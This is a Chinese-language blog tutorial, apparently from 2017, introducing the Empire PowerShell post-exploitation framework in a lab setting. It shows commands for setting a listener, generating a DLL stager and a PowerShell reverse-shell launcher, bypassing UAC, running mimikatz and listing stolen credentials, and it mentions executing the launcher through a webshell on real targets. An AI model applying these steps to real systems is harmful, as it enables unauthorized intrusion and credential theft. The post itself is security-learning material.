初探域渗透神器Empire

smileTT 内网渗透 2017年5月9日发布
Favorite收藏

导语:在你心目中并肩Metasploit的神器有谁?

0x01奇怪的开始

我趁手机不注意,把它自由落体了,好在屏幕没裂开,只不过是断触了,要不对于已经穷疯了的我无疑又是一笔经济负担。好在手机还在保修期内,可以送过去修,但是我去的时间点不对。售后说要下班了,手机要明天才能修,我也没多说什么,手机留下就回来了。晚上,蹲厕所,叼着烟对着手纸发呆,心想:“我擦,我484傻,明天还要去拿了,我干嘛不明天再去修?”

翻着各大论坛,看到了Empire的关键字,没看明白他到底在干嘛。但是早听大佬说过他们用Empire的光辉事迹,趁手机不再,研究下此神器

0x02 Empire简介

一说内网,我们基本都是在第一时间想到Metasploit,因为有Metasploit这么强大的存在我们很少能注意到别的工具。Metasploit的牛逼之处在于他不管是信息收集,渗透,后渗透,木马,社工,你能想到的他基本都可以做到,杀人越货必备啊。但是Empire就是针对内网渗透,针对Powershell,我们在内网渗透中肯能用到的powershell脚本,全部都在Empire的框架中了,更是域渗透神器!但是关于Empire的资料,国内真的是少的可怜,就那么几篇。做安全,不得不佩服国外的大牛们!

0x03 Empire基本用法

下载什么的我就不废话了,github上克隆回来运行install.sh就好

Github:https://github.com/EmpireProject/Empire

不喜欢用命令的同学可以去安装一个GUI界面的,也是国外大牛用php写的一个web界面

Github:https://github.com/interference-security/empire-web

大家自行安装吧~~

先来看看Empire的界面是什么样子的,看起来跟Metasploit感觉是一样的~ 高大上   

图片1.png

我们可以很清楚的看到有180个模块,0个监听,0个代理

Agents用谷歌翻译出来是代理的意思,我们把它理解成会话就行跟Metasploit一样session。

我们首先要创建一个监听,就跟Metaploit创建一个监听载荷一个意思

在命令行里输入Listener就可以进入监听

Options / info 查看需要设置的选项info也是可以的,

1494231522623743.png

我们只需要设置简单的Host就可以了,当然如果想修改名字的话也可以

Set host http://你的ip:端口  设置Host
Set name smiletest  设置当前监听的名字
Execute  执行  run也可以

1494231721709062.png

我们设置好了之后需要生成一个可以反弹的shellcode 

Empire可以生成14种类型的木马

1494231747164263.png

我们选择dll(是不是有人又想到NSA的漏洞了- -,当然也可以,自由发挥吧)

Usestager dll

1494231815491642.png

我们可以设置Listener,然后执行execute生成dll木马

会生成在/tmp/launcher.dll中了

Set Listener smiltest
Execute

图片6.png

我们也可以不生成dll文件

Back
Launcher smiltest

直接生成powershell命令,当执行这命令的时候会给我们回弹一个shell

1494232120483863.png

直接拖到虚拟机里去执行,真正的渗透环境中,直接在webshell里执行就好,但前提是目标机器必须有powershell

当我们执行后,命令行窗口一闪而过,接不到图,但是在我本机下已经反弹了一个会话,可以查看我们的会话列表

agents

1494232136433721.png

如果想选择进入会话,在终端输入

interact EZUGW142B4KDFBVS

这个名字是Empire给我们生成的名字,看着这个名字感觉太长了,以后用起来感觉麻烦,我们可以修改这个名字

rename 原来的名字 修改的名字

1494232205691176.png

进入终端后输入help看看我们可以做什么

1494232258535947.png

可以看到很多的命令,一点都不比Metasploit弱

在这里输入的命令如果不是这里面的命令的话,我们的命令会被解析为windows命令执行,并给回显。但是这里要注意了,你每写完一道命令敲下回车以后,不要感觉是没有回显,要稍等一下才会回显出来

比如说,我写一道ipconfig命令,并不再这个列表中,那么我们会在靶机执行这道命令,如图:

图片11.png

再来看看他的命令

Agents 和 back 这两个命令在我们现在的情况来看是差不多的

Back 是返回上级,而我们的上级是agents,当写agents的时候,也会回到agents文件

Bypassuac 是提权神级命令,敲完命令就提权

1494232294316097.png

这里返回了一个新的绘画,区别就是在USERBANE前加了星号

有了这个*就代表已经提权成功了,我们先用没有星号的执行mimikatz

它会给出如下提示

图片13.png

用有星号的试一试

1494232326419740.png

已经读取成功了,Empire有个很方便的地方,就是,我们不需要在mimikatz的回显中去寻找密码,他已经帮我们列举好了,我们只需要执行creds命令,密码就出来了。

1494232342514439.png

从这里便可窃取身份令牌

不过当然也有bypassuac不能直接提权的情况了,我们后续再说

Sc命令 截图一张

1494232363110606.png

Download 下载文件

用法:download [path]

图片17.png

Upload 当然就是上传咯

用法:upload 文件 靶机路径

图片18.png

Usemoudle 使用模块,这才是最有用的地方。先来个恶作剧把,在靶机上弹窗,提示 “I am hacker”

usemodule trollsploit/message

1494232386427147.png

靶机上的提示

图片20.png

这就完成了一次恶作剧

0x04 躺在床上的总结

大致学习了一下,感受到了Empire的强大之处,丝毫不弱与Metasploit他就是针对powershell的内网渗透工具,虽然没有Metasploit那么强大的各种平台都能打,但是单单针对windows,以及域渗透的强大之处是Metasploit不能比的。而且他还跟Metasploit一样,有强大的接口,以便于我们写我们自己的payload。绝对是一款不可多得的神兵利器!

想更深入了解Empire,请期待我的下一篇文章–《Empire域渗透实战》

本文为 smileTT 原创稿件,授权嘶吼独家发布,未经许可禁止转载,如若转载,请联系嘶吼编辑: http://www.4hou.com/technology/4581.html
点赞 4
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论

    蔡宁宁 2017-05-09 11:13

    好厉害~